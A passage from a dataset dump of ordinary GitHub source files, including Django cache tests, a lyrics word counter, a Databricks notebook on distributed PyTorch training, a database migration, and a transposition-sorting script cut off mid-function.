to tensorboard\n # tb.add_scalars('training_rewards',\n # {'Epidosic Summed Rewards': score,\n # 'Moving Mean of Episodic Rewards': avg_score}, i)\n\n # Dump .json\n with open(os.path.join(data_path, 'training_info.json'), 'w', encoding='utf8') as file:\n json.dump(logging_info, file, indent=4, ensure_ascii=False)\n\n # Close tensorboard writer\n tb.close()\n","repo_name":"its-ant-bupt/HALOES","sub_path":"rl/sparse_rewards/prioritized/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":25982,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"24623177913","text":"from newsfeeds.services import NewsFeedService\nfrom testing.testcases import TestCase\nfrom twitter.cache import USER_NEWSFEEDS_PATTERN\nfrom utils.redis_client import RedisClient\n\n\nclass NewsFeedServiceTests(TestCase):\n\n def setUp(self):\n super(NewsFeedServiceTests, self).setUp()\n self.kellynim = self.create_user('kellynim')\n self.talenti = self.create_user('talenti')\n\n def test_get_user_newsfeeds(self):\n newsfeed_ids = []\n for i in range(3):\n tweet = self.create_tweet(self.talenti)\n newsfeed = self.create_newsfeed(self.kellynim, tweet)\n newsfeed_ids.append(newsfeed.id)\n newsfeed_ids = newsfeed_ids[::-1]\n\n # cache miss\n newsfeeds = NewsFeedService.get_cached_newsfeeds(self.kellynim.id)\n self.assertEqual([f.id for f in newsfeeds], newsfeed_ids)\n\n # cache hit\n newsfeeds = NewsFeedService.get_cached_newsfeeds(self.kellynim.id)\n self.assertEqual([f.id for f in newsfeeds], newsfeed_ids)\n\n # cache updated\n tweet = self.create_tweet(self.kellynim)\n new_newsfeed = self.create_newsfeed(self.kellynim, tweet)\n newsfeeds = NewsFeedService.get_cached_newsfeeds(self.kellynim.id)\n newsfeed_ids.insert(0, new_newsfeed.id)\n self.assertEqual([f.id for f in newsfeeds], newsfeed_ids)\n\n def test_create_new_newsfeed_before_get_cached_newsfeeds(self):\n feed1 = self.create_newsfeed(self.kellynim, self.create_tweet(self.kellynim))\n\n RedisClient.clear()\n conn = RedisClient.get_connection()\n\n key = USER_NEWSFEEDS_PATTERN.format(user_id=self.kellynim.id)\n self.assertEqual(conn.exists(key), False)\n feed2 = self.create_newsfeed(self.kellynim, self.create_tweet(self.kellynim))\n self.assertEqual(conn.exists(key), True)\n\n feeds = NewsFeedService.get_cached_newsfeeds(self.kellynim.id)\n self.assertEqual([f.id for f in feeds], [feed2.id, feed1.id])\n","repo_name":"yw1101/django-socialmedia","sub_path":"newsfeeds/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16355928409","text":"import json\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nimport string\n\n\ndef artist_used_most(search_word: str, clean_artist_lyric_list: list):\n\n \"\"\"\n Get top 5 artists who used word most.\n\n :param search_word: From input box on homepage of Flask app.\n :param clean_artist_lyric_list: List of dictionaries of artists and all their lyrics.\n :return: List of artists and word count.\n \"\"\"\n\n # get the word counts of all artists\n word_count_list = []\n for index in range(len(clean_artist_lyric_list)):\n try:\n word_counts = {'Artist': clean_artist_lyric_list[index]['Artist'],\n 'Lyrics count': clean_artist_lyric_list[index]['Lyrics'].lower().count(search_word)}\n word_count_list.append(word_counts)\n except KeyError:\n continue\n word_count_list = sorted(word_count_list, key=lambda item: 
item['Lyrics count'], reverse=True)\n\n return word_count_list[0:5]\n\n\ndef clean_data():\n \"\"\"\"\n Takes the original json and cleans it using NLTK. Take out punctuation and most stop words.\n\n Currently not working 100% correctly.\n \"\"\"\n\n file = 'artist_lyrics.json'\n with open(file) as file_object:\n json_object = json.load(file_object)\n\n stop_words = set(stopwords.words('english'))\n more_to_remove = ['', '`', 'nt', 'gon', '’']\n stop_words.update(more_to_remove)\n punctuation_table = str.maketrans('', '', string.punctuation)\n\n for artist in json_object:\n if len(artist) > 1:\n split_lyrics = word_tokenize(artist['Lyrics'].lower().strip())\n no_punctuation = [words.translate(punctuation_table) for words in split_lyrics]\n cleaned = [word for word in no_punctuation if word not in stop_words]\n artist['Lyrics'] = \" \".join(cleaned)\n\n else:\n continue\n\n with open(file, 'w+') as file_object:\n json.dump(json_object, file_object)\n\n\ndef open_file():\n filename = 'artist_lyrics.json'\n with open(filename) as file_object:\n json_obj = json.load(file_object)\n return json_obj\n\n\ndef main():\n search_word = \"Home\".lower()\n artist_lyric_dict = open_file()\n artist_used_most(search_word, artist_lyric_dict)\n clean_data()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"JordanGunn/LyriCount","sub_path":"artist_used_most.py","file_name":"artist_used_most.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28942812189","text":"\"\"\"\nDaire Alanı : pi*r**2\nDaire ÇEvresi: 2*pi*r\n\n**Yarı çapı verilen bir dairenin alan ve çevresini hesaplayınız\n** (r: 3.14)\n\"\"\"\n\npi = 3.14 #zorunlu deger\n\nr= float(input(\"Yarı Çapı Giriniz: \")) # burada tek girdimiz r(yarıçap) olduğu için input degeri verdik çünkü alan ve çevre hesabı yapılırken yarıçap kullanılmaktadır.\n# Ayrıca float'a donusturme nedinmiz r(yarıçapın) ondalıklı olma ihtimali yüzündendir\n\nalan = pi*r**2\ncevre = float(2*pi*r)\n\nprint(\"Alanı: \", str(alan) + \" Çevresi:\", str(cevre)) # BURADA str(alan) - str(cevre) yapma nedenimiz: float sayılar ile string birleştirme işleminde kullanmadıgımızdan dolayı\n\n# print(\"Dairenin Alanı: \",alan)\n# print(\"Dairenin Çevre Uzunluğu\", cevre)","repo_name":"aliiskk/road-to-python","sub_path":"1-Python Objects/5-type-conversion-demo.py","file_name":"5-type-conversion-demo.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26162239961","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC # Databricksノートブックにおけるエンドツーエンドの分散トレーニング\n# MAGIC \n# MAGIC PyTorchにおける分散トレーニングは多くの場合、ファイル(`train.py`)を作成し、そのファイルを用いた分散トレーニングを実行するために`torchrun` CLIを使用します。Databricksでは、Databricksノートブック上で直接分散トレーニングを実行するメソッドを提供します。ノートブック内で`train()`関数を定義し、複数のワーカーでモデルをトレーニングするために`TorchDistributor` APIを使用することができます。\n# MAGIC \n# MAGIC このノートブックでは、どのようにノートブック内でインタラクティブな開発を行うのかを説明します。特に大規模なディープラーニングプロジェクトにおいては、ご自身のコードを管理可能なチャンクに分割するために`%run`コマンドを活用することを推奨します。\n# MAGIC \n# MAGIC このノートブックでは:\n# MAGIC - 古典的なMNISTデータセットに対してシンプルな単一GPUモデルをトレーニングします。\n# MAGIC - 分散トレーニングのコードに変換します。\n# MAGIC - 複数GPUあるいは複数ノードにモデルのトレーニングをスケールアップするために、どのようにTorchDistributorを活用できるのかを学びます。\n# MAGIC \n# MAGIC ## 要件\n# MAGIC - Databricks Runtime ML 13.0以降\n# MAGIC - (推奨) GPUインスタンス [AWS](https://docs.databricks.com/clusters/gpu.html) | [Azure](https://learn.microsoft.com/en-gb/azure/databricks/clusters/gpu) | 
[GCP](https://docs.gcp.databricks.com/clusters/gpu.html)\n\n# COMMAND ----------\n\n# MAGIC %md \n# MAGIC \n# MAGIC ### MLflowのセットアップ\n# MAGIC \n# MAGIC MLflowは機械学習エクスペリメントとモデルのロギングをサポートするツールです。\n# MAGIC \n# MAGIC **注意** MLflow PyTorch Autologging APIはPyTorch Lightning向けに設計されており、ネイティブなPyTorchでは動作しません。\n\n# COMMAND ----------\n\nimport mlflow\n\nusername = spark.sql(\"SELECT current_user()\").first()['current_user()']\nusername\n\nexperiment_path = f'/Users/{username}/pytorch-distributor'\n\n# これらは後で必要となります\ndb_host = \"https:///\" # 変更してください!\ndb_token = dbutils.notebook.entry_point.getDbutils().notebook().getContext().apiToken().get()\n\n# IDを確認し、スケールする際にワーカーノードに送信できるように、手動でエクスペリメントを作成します\nexperiment = mlflow.set_experiment(experiment_path)\n\n# COMMAND ----------\n\n# MAGIC %md ## トレーニング、テスト関数の定義\n# MAGIC \n# MAGIC 以下のセルには、モデルを記述するコード、トレーニング関数、テスト関数が含まれています。これらすべてはローカルで実行するようにデザインされています。次に、このコードにはローカル環境から分散環境でのトレーニングへの移行に必要な変更が導入されます。\n# MAGIC \n# MAGIC すべてのtorchコードは標準的なPyTorch APIを活用しており、カスタムライブラリやコードの記述方法の変更は不要です。このノートブックは`TorchDistributor`を用いたトレーニングのスケール方法にフォーカスしているので、モデルコードの説明はしません。\n\n# COMMAND ----------\n\nimport torch\nNUM_WORKERS = 2\nNUM_GPUS_PER_NODE = torch.cuda.device_count()\n\n# COMMAND ----------\n\nPYTORCH_DIR = '/dbfs/ml/pytorch'\n\nbatch_size = 100\nnum_epochs = 3\nmomentum = 0.5\nlog_interval = 100\nlearning_rate = 0.001\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n# モデルの定義\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(1, 10, kernel_size=5)\n self.conv2 = nn.Conv2d(10, 20, kernel_size=5)\n self.conv2_drop = nn.Dropout2d()\n self.fc1 = nn.Linear(320, 50)\n self.fc2 = nn.Linear(50, 10)\n\n def forward(self, x):\n x = F.relu(F.max_pool2d(self.conv1(x), 2))\n x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))\n x = x.view(-1, 320)\n x = F.relu(self.fc1(x))\n x = F.dropout(x, training=self.training)\n x = self.fc2(x)\n return F.log_softmax(x)\n\ndef train_one_epoch(model, device, data_loader, optimizer, epoch):\n model.train()\n for batch_idx, (data, target) in enumerate(data_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n if batch_idx % log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(data_loader) * len(data),\n 100. 
* batch_idx / len(data_loader), loss.item()))\n \n mlflow.log_metric('train_loss', loss.item())\n\ndef save_checkpoint(log_dir, model, optimizer, epoch):\n filepath = log_dir + '/checkpoint-{epoch}.pth.tar'.format(epoch=epoch)\n state = {\n 'model': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n }\n torch.save(state, filepath)\n \ndef load_checkpoint(log_dir, epoch=num_epochs):\n filepath = log_dir + '/checkpoint-{epoch}.pth.tar'.format(epoch=epoch)\n return torch.load(filepath)\n\ndef create_log_dir():\n log_dir = os.path.join(PYTORCH_DIR, str(time()))\n os.makedirs(log_dir)\n return log_dir\n\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nfrom time import time\nimport os\n\nbase_log_dir = create_log_dir()\nprint(\"Log directory:\", base_log_dir)\n\ndef train(log_dir):\n device = torch.device('cuda')\n\n train_parameters = {'batch_size': batch_size, 'epochs': num_epochs}\n mlflow.log_params(train_parameters)\n \n train_dataset = datasets.MNIST(\n 'data', \n train=True,\n download=True,\n transform=transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]))\n data_loader = torch.utils.data.DataLoader(train_dataset, batch_size=batch_size, shuffle=True)\n\n model = Net().to(device)\n\n optimizer = optim.SGD(model.parameters(), lr=learning_rate, momentum=momentum)\n\n for epoch in range(1, num_epochs + 1):\n train_one_epoch(model, device, data_loader, optimizer, epoch)\n save_checkpoint(log_dir, model, optimizer, epoch)\n \ndef test(log_dir):\n device = torch.device('cuda')\n loaded_model = Net().to(device)\n scripted_model = torch.jit.script(loaded_model)\n \n checkpoint = load_checkpoint(log_dir)\n loaded_model.load_state_dict(checkpoint['model'])\n loaded_model.eval()\n\n test_dataset = datasets.MNIST(\n 'data', \n train=False,\n download=True,\n transform=transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]))\n data_loader = torch.utils.data.DataLoader(test_dataset)\n\n test_loss = 0\n for data, target in data_loader:\n data, target = data.to(device), target.to(device)\n output = loaded_model(data)\n test_loss += F.nll_loss(output, target)\n \n test_loss /= len(data_loader.dataset)\n print(\"Average test loss: {}\".format(test_loss.item()))\n \n mlflow.log_metric('test_loss', test_loss.item())\n \n mlflow.pytorch.log_model(scripted_model, \"model\")\n \n\n# COMMAND ----------\n\n# MAGIC %md ### ローカルでモデルをトレーニング\n# MAGIC \n# MAGIC これが適切に動作することをテストするために、上で定義した関数を用いてトレーニングとテストのイテレーションを起動することができます。\n\n# COMMAND ----------\n\nwith mlflow.start_run():\n \n mlflow.log_param('run_type', 'local')\n train(base_log_dir)\n test(base_log_dir)\n \n\n# COMMAND ----------\n\n# MAGIC %md ## 分散セットアップ\n# MAGIC \n# MAGIC シングルノードのコードを`train()`関数でラッピングする際、ライブラリのpickleに関する問題を避けるために、すべてのimport文を`train()`関数に含めることを推奨します。\n# MAGIC \n# MAGIC 他の全ては、PyTorch内で分散トレーニングが動作するようにするために通常必要となるものです。\n# MAGIC \n# MAGIC - `train()`の最初で`dist.init_process_group(\"nccl\")`の呼び出し\n# MAGIC - `train()`の最後で`dist.destroy_process_group()`の呼び出し\n# MAGIC - `local_rank = int(os.environ[\"LOCAL_RANK\"])`の設定\n# MAGIC - `DataLoader`に`DistributedSampler`を追加\n# MAGIC - `DDP(model)`でモデルをラッピング\n# MAGIC - 詳細は https://pytorch.org/tutorials/intermediate/ddp_series_multinode.html をご覧ください\n\n# COMMAND ----------\n\nsingle_node_single_gpu_dir = create_log_dir()\nprint(\"Data is located at: \", single_node_single_gpu_dir)\n\ndef train_one_epoch(model, device, data_loader, optimizer, epoch):\n model.train()\n for batch_idx, (data, target) in 
enumerate(data_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n if batch_idx % log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(data_loader) * len(data),\n 100. * batch_idx / len(data_loader), loss.item()))\n \n if int(os.environ[\"RANK\"]) == 0:\n mlflow.log_metric('train_loss', loss.item())\n\ndef save_checkpoint(log_dir, model, optimizer, epoch):\n filepath = log_dir + '/checkpoint-{epoch}.pth.tar'.format(epoch=epoch)\n state = {\n 'model': model.module.state_dict(),\n 'optimizer': optimizer.state_dict(),\n }\n torch.save(state, filepath)\n\n# 分散トレーニングでは、1つのmain関数にトレーニングステップとテストステップをマージします\ndef main_fn(directory):\n \n #### ここにimport文を追加 ####\n import mlflow\n import torch.distributed as dist\n from torch.nn.parallel import DistributedDataParallel as DDP\n from torch.utils.data.distributed import DistributedSampler\n \n ############################\n\n ##### MLflowのセットアップ ####\n # 別々のプロセスがMLflowを見つけられるようにするためにこれが必要です\n os.environ['DATABRICKS_HOST'] = db_host\n os.environ['DATABRICKS_TOKEN'] = db_token\n\n # エクスペリメントの詳細をここで設定します\n experiment = mlflow.set_experiment(experiment_path)\n ############################\n \n print(\"Running distributed training\")\n dist.init_process_group(\"nccl\")\n \n local_rank = int(os.environ[\"LOCAL_RANK\"])\n global_rank = int(os.environ[\"RANK\"])\n \n if global_rank == 0:\n train_parameters = {'batch_size': batch_size, 'epochs': num_epochs, 'trainer': 'TorchDistributor'}\n mlflow.log_params(train_parameters)\n \n train_dataset = datasets.MNIST(\n 'data',\n train=True,\n download=True,\n transform=transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]))\n \n #### 分散データローダーの追加 ####\n train_sampler = DistributedSampler(dataset=train_dataset)\n data_loader = torch.utils.data.DataLoader(train_dataset, batch_size=batch_size, sampler=train_sampler)\n ######################################\n \n model = Net().to(local_rank)\n #### 分散モデルの追加 ####\n ddp_model = DDP(model, device_ids=[local_rank], output_device=local_rank)\n #################################\n\n optimizer = optim.SGD(ddp_model.parameters(), lr=learning_rate, momentum=momentum)\n for epoch in range(1, num_epochs + 1):\n train_one_epoch(ddp_model, local_rank, data_loader, optimizer, epoch)\n \n if global_rank == 0: \n save_checkpoint(directory, ddp_model, optimizer, epoch)\n \n # テスト用にモデルを保存\n if global_rank == 0:\n mlflow.pytorch.log_model(ddp_model, \"model\")\n \n ddp_model.eval()\n test_dataset = datasets.MNIST(\n 'data', \n train=False,\n download=True,\n transform=transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]))\n data_loader = torch.utils.data.DataLoader(test_dataset) \n\n test_loss = 0\n for data, target in data_loader:\n device = torch.device('cuda')\n data, target = data.to(device), target.to(device)\n output = ddp_model(data)\n test_loss += F.nll_loss(output, target)\n \n test_loss /= len(data_loader.dataset)\n print(\"Average test loss: {}\".format(test_loss.item()))\n \n mlflow.log_metric('test_loss', test_loss.item())\n\n \n dist.destroy_process_group()\n \n return \"finished\" # 任意のpickle可能なオブジェクトを返却できます\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC \n# MAGIC ### TorchDistributorなしのテスト\n# MAGIC \n# MAGIC 以下では、シングルGPUでトレーニングを実行することでトレーニングループを検証します。\n\n# COMMAND ----------\n\n# 
すべてのプロセスが動作していることをクイックにテストするためのシングルノードにおける分散実行\nwith mlflow.start_run():\n mlflow.log_param('run_type', 'test_dist_code')\n main_fn(single_node_single_gpu_dir)\n \n\n# COMMAND ----------\n\n# MAGIC %md ### マルチGPUシングルノードのトレーニング\n# MAGIC \n# MAGIC PyTorchでは、マルチGPUシングルノードでトレーニングを行うための[roundabout way](https://pytorch.org/tutorials/beginner/ddp_series_multigpu.html)を提供しています。Databricksでは、マルチGPUシングルノードをマルチノードにシームレスに移行できるより効率的なソリューションを提供しています。DatabricksでマルチGPUシングルノードのトレーニングを行うには、`TorchDistributor` APIを呼び出し、使用したいドライバーノードで利用できるGPUの数を`num_processes`に設定し、`local_mode=True`を設定します。\n\n# COMMAND ----------\n\nsingle_node_multi_gpu_dir = create_log_dir()\nprint(\"Data is located at: \", single_node_multi_gpu_dir)\n\nfrom pyspark.ml.torch.distributor import TorchDistributor\n\noutput = TorchDistributor(num_processes=2, local_mode=True, use_gpu=True).run(main_fn, single_node_multi_gpu_dir)\ntest(single_node_multi_gpu_dir)\n\n# COMMAND ----------\n\n# MAGIC %md ### マルチノードのトレーニング\n# MAGIC \n# MAGIC マルチGPUシングルノードからマルチノードのトレーニングに移行するには、すべてのワーカーノードで利用したいGPUの数に`num_processes`を変更するだけです。このサンプルではすべてのGPU(`NUM_GPUS_PER_NODE * NUM_WORKERS`)を使用しています。また、`local_mode`を`False`に設定します。さらに、トレーニング関数を実行するそれぞれのSparkタスクでいくつのGPUを使用するのかを設定するには、クラスターを作成する前にクラスターページにあるSpark設定で`set spark.task.resource.gpu.amount `を設定します。\n\n# COMMAND ----------\n\nmulti_node_dir = create_log_dir()\nprint(\"Data is located at: \", multi_node_dir)\n\noutput_dist = TorchDistributor(num_processes=2, local_mode=False, use_gpu=True).run(main_fn, multi_node_dir)\ntest(multi_node_dir)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC # END\n","repo_name":"taka-yayoi/public_repo_2","sub_path":"TorchDistributor_end_to_end_sample/Databricksノートブックにおけるエンドツーエンドの分散トレーニング.py","file_name":"Databricksノートブックにおけるエンドツーエンドの分散トレーニング.py","file_ext":"py","file_size_in_byte":15526,"program_lang":"python","lang":"ja","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"38806644202","text":"from migrate import ForeignKeyConstraint\n\nfrom rack.openstack.common.gettextutils import _\nfrom rack.openstack.common import log as logging\n\nfrom sqlalchemy import Boolean, DateTime, Integer, String, Text\nfrom sqlalchemy import Column, MetaData, Table\n\nLOG = logging.getLogger(__name__)\n\nmeta = MetaData()\n\nkeypairs = Table('keypairs', meta,\n Column('created_at', DateTime),\n Column('updated_at', DateTime),\n Column('deleted_at', DateTime),\n Column('deleted', Integer),\n Column('keypair_id', String(length=36),\n primary_key=True, nullable=False),\n Column('gid', String(length=36), nullable=False),\n Column('nova_keypair_id', String(length=255)),\n Column('private_key', Text),\n Column('display_name', String(length=255)),\n Column('is_default', Boolean),\n Column('user_id', String(length=255)),\n Column('project_id', String(length=255)),\n mysql_engine='InnoDB',\n mysql_charset='utf8'\n )\n\n\ndef upgrade(migrate_engine):\n meta.bind = migrate_engine\n\n try:\n keypairs.create()\n groups = Table(\"groups\", meta, autoload=True)\n ForeignKeyConstraint([keypairs.c.gid], [groups.c.gid]).create()\n except Exception:\n LOG.info(repr(keypairs))\n LOG.exception(_('Exception while creating keypairs table.'))\n raise\n\n\ndef downgrade(migrate_engine):\n meta.bind = migrate_engine\n\n try:\n keypairs.drop()\n except Exception:\n LOG.info(repr(keypairs))\n LOG.exception(_('Exception while dropping keypairs table.'))\n 
raise\n","repo_name":"tkaneko0204/rack","sub_path":"rack/db/sqlalchemy/migrate_repo/versions/003_Add_keypairs_table.py","file_name":"003_Add_keypairs_table.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20491894869","text":"import sys\nimport math\nimport networkx as nx\nfrom numpy.core.fromnumeric import transpose\nfrom numpy.lib.function_base import place\nimport pyvis.network\nimport numpy as np\n\n\nSOLUTIONS_LIST = []\nEQUIVALENCE_DUMP = set()\n\n\ndef create_all_equiv(transposition_list):\n equiv_list = [transposition_list]\n current_transposition = sort_and_make(transposition_list)\n while(not current_transposition == transposition_list):\n equiv_list.append(current_transposition)\n current_transposition = sort_and_make(current_transposition)\n if len(current_transposition) < len(transposition_list):\n print(transposition_list, \"got turned into\", current_transposition)\n break\n # print(\"all done!\")\n return equiv_list\n\n\ndef standard_order(transposition_list):\n new_t_list = transposition_list\n for t in range(len(new_t_list)-1):\n transposition = new_t_list[t]\n next_transposition = new_t_list[t+1]\n if transposition+1 < next_transposition:\n new_t_list[t] = next_transposition\n new_t_list[t+1] = transposition\n return standard_order(new_t_list)\n return new_t_list\n\n\ndef sort_and_make(transposition_list):\n final_transposition_list = []\n pools = create_pools(transposition_list)\n # for pool in pools:\n # print(pool)\n even_list = []\n for i in range(math.ceil(len(pools)/2)):\n even_list.append(find_endpoint(pools[i*2]))\n # for _ in range(15):\n while(True):\n protected = np.zeros(len(even_list))\n for i in range(math.floor(len(pools)/2)):\n pool = pools[i*2+1]\n items_to_remove = []\n for item in pool:\n marked = [None, None]\n for e in range(len(even_list)):\n even = even_list[e]\n if item[0] == even:\n marked[0] = e\n elif item[1] == even:\n marked[1] = e\n if marked[0] is not None and marked[1] is not None:\n final_transposition_list.append(\n len(pools)-1-(marked[0]+marked[1]))\n # print(\"b\", len(pools)-1-(marked[0]+marked[1]))\n items_to_remove.append(item)\n elif marked[0] is not None:\n protected[marked[0]] = 1\n elif marked[1] is not None:\n protected[marked[1]] = 1\n for item in items_to_remove:\n pool.remove(item)\n even_list, pools, to_append = increment_vertices(\n even_list, pools, protected)\n for transposition in to_append:\n final_transposition_list.append(transposition)\n if sum([len(pool) for pool in pools]) == max(transposition_list) % 2:\n break\n return standard_order(final_transposition_list)\n\n\ndef find_endpoint(pool):\n if pool[0][1] is None:\n return pool[0][0]\n full_list = []\n for entry in pool:\n for i in range(2):\n if entry[i] in full_list:\n full_list.remove(entry[i])\n else:\n full_list.append(entry[i])\n return full_list[[entry[0] for entry in full_list].index(min([entry[0] for entry in full_list]))]\n\n\ndef increment_vertices(currents, pools, protected):\n newPool = pools\n new_current = currents\n transpositions = []\n for i in range(len(currents)):\n item = currents[i]\n if protected[i] == 0 and len(newPool[i*2]) > 0 and newPool[i*2][0][1] is not None:\n new_current[i], newPool[i *\n 2] = get_next_from_pool(item, newPool[i*2])\n transpositions.append(len(pools)-1-i*2)\n # print(\"a\", len(pools)-1-i*2)\n break\n return new_current, newPool, transpositions\n\n\ndef get_next_from_pool(current, list):\n newList = list\n for 
item in list:\n if item[0] == current:\n newList.remove(item)\n current = item[1]\n return(current, newList)\n elif item[1] == current:\n newList.remove(item)\n current = item[0]\n return(current, newList)\n return(current, newList)\n\n\ndef create_pools(transposition_list):\n bitmasks = all_bitmasks(transposition_list)\n pools = []\n if max(transposition_list) % 2 == 1:\n pools.append([((max(transposition_list)-1, 0), (None))])\n for b in range(len(bitmasks)):\n pools.append([])\n vx = vertex_form(transposition_list)\n for i in range(max(transposition_list)+1):\n for n in range(len(transposition_list)):\n if transposition_list[n] == i:\n for b in range(len(bitmasks)):\n if bitmasks[b][n] == 1:\n pools[b+max(transposition_list) % 2].append(vx[n])\n break\n # for pool in pools:\n # print(pool)\n return pools\n\n\ndef vertex_form(transposition_list):\n current_count = np.zeros(1+math.ceil(max(transposition_list)/2))\n vx_list = []\n for i in transposition_list:\n vx = np.zeros((2, 2))\n if i % 2 == 0:\n vx = ((i, int(current_count[int(i/2)])),\n (i, int(current_count[int(i/2)]+1)))\n current_count[int(i/2)] += 1\n else:\n vx = ((i-1, int(current_count[int((i-1)/2)])),\n (i+1, int(current_count[int((i+1)/2)])))\n vx_list.append(vx)\n return vx_list\n\n\ndef all_bitmasks(transposition_list, raw=True):\n bitmask_list = []\n current_bitmask = np.zeros(len(transposition_list))\n mx = max(transposition_list)\n layers = math.ceil(mx/2)\n if mx % 2 == 0:\n short_line = short_line_bitmask(\n transposition_list, np.zeros(len(transposition_list)))\n if raw:\n bitmask_list.append(short_line)\n else:\n bitmask_list.append((\"short\", short_line))\n current_bitmask += short_line\n short_pad = short_pad_bitmask(transposition_list, current_bitmask)\n if raw:\n bitmask_list.append(short_pad)\n else:\n bitmask_list.append((\"padding\", short_pad))\n current_bitmask += short_pad\n else:\n point = point_bitmask(transposition_list)\n if raw:\n bitmask_list.append(point)\n else:\n bitmask_list.append((\"point\", point))\n current_bitmask += point\n for layer in range(layers):\n if layer == layers - 1:\n short_line = short_line_bitmask(\n transposition_list, current_bitmask)\n if raw:\n bitmask_list.append(short_line)\n else:\n bitmask_list.append((\"short\", short_line))\n current_bitmask += short_line\n else:\n line = line_bitmask(transposition_list, current_bitmask)\n if raw:\n bitmask_list.append(line)\n else:\n bitmask_list.append((\"line\", line))\n current_bitmask += line\n pad = pad_bitmask(transposition_list, current_bitmask)\n if raw:\n bitmask_list.append(pad)\n else:\n bitmask_list.append((\"padding\", pad))\n current_bitmask += pad\n return bitmask_list\n\n\ndef point_bitmask(transposition_list):\n mx = max(transposition_list)\n bitmask = np.zeros(len(transposition_list))\n for t in range(len(transposition_list)):\n if transposition_list[t]+3 > mx:\n bitmask[t] = 1\n if transposition_list[t]+1 == mx:\n break\n return bitmask\n\n\ndef short_pad_bitmask(transposition_list, ignore_list):\n mod_list = transposition_list*(1-ignore_list)\n mx = max(mod_list)\n bitmask = np.zeros(len(mod_list))\n target_numbers_found = [0, 0]\n for t in range(len(mod_list)):\n if mod_list[t] == mx and target_numbers_found[0] == 0:\n bitmask[t] = 1\n target_numbers_found[0] = 1\n elif transposition_list[t]+1 == mx and ignore_list[t] == 0 and sum(target_numbers_found) < 2:\n bitmask[t] = 1\n elif transposition_list[t]+2 == mx and ignore_list[t] == 0 and target_numbers_found[1] == 0:\n bitmask[t] = 1\n target_numbers_found[1] = 
1\n elif transposition_list[t]+3 == mx and ignore_list[t] == 0 and target_numbers_found[1] == 0:\n bitmask[t] = 1\n return bitmask\n\n\ndef pad_bitmask(transposition_list, ignore_list):\n mod_list = transposition_list*(1-ignore_list)\n mx = max(mod_list)\n if mx % 2 == 0:\n mx += 1\n bitmask = np.zeros(len(mod_list))\n target_numbers_found = [0, 0]\n for t in range(len(mod_list)):\n if mod_list[t] == mx:\n bitmask[t] = 1\n elif transposition_list[t]+1 == mx and ignore_list[t] == 0 and target_numbers_found[0] == 0:\n bitmask[t] = 1\n target_numbers_found[0] = 1\n elif transposition_list[t]+2 == mx and ignore_list[t] == 0 and sum(target_numbers_found) < 2:\n bitmask[t] = 1\n elif transposition_list[t]+3 == mx and ignore_list[t] == 0 and target_numbers_found[1] == 0:\n bitmask[t] = 1\n target_numbers_found[1] = 1\n elif transposition_list[t]+4 == mx and ignore_list[t] == 0 and target_numbers_found[1] == 0:\n bitmask[t] = 1\n return bitmask\n\n\ndef short_line_bitmask(transposition_list, ignore_list):\n if not sum(ignore_list) == 0:\n return 1 - ignore_list\n mod_list = transposition_list*(1-ignore_list)\n mx = max(mod_list)\n if mx % 2 == 1:\n mx += 1\n bitmask = np.zeros(len(mod_list))\n target_numbers_found = 0\n for t in range(len(mod_list)):\n if transposition_list[t]+3 > mx and ignore_list[t] == 0 and target_numbers_found == 0:\n bitmask[t] = 1\n if transposition_list[t]+1 == mx and ignore_list[t] == 0:\n target_numbers_found = 1\n return bitmask\n\n\ndef line_bitmask(transposition_list, ignore_list):\n mod_list = transposition_list*(1-ignore_list)\n mx = max(mod_list)\n if mx % 2 == 1:\n mx += 1\n bitmask = np.zeros(len(mod_list))\n target_numbers_found = [0, 0]\n for t in range(len(mod_list)):\n if mod_list[t] == mx:\n bitmask[t] = 1\n elif transposition_list[t]+1 == mx and ignore_list[t] == 0 and target_numbers_found[0] == 0:\n bitmask[t] = 1\n target_numbers_found[0] = 1\n elif transposition_list[t]+2 == mx and ignore_list[t] == 0 and sum(target_numbers_found) < 2:\n bitmask[t] = 1\n elif transposition_list[t]+3 == mx and ignore_list[t] == 0 and target_numbers_found[1] == 0:\n bitmask[t] = 1\n target_numbers_found[1] = 1\n elif transposition_list[t]+4 == mx and ignore_list[t] == 0 and target_numbers_found[1] == 0:\n bitmask[t] = 1\n return bitmask\n\n\ndef 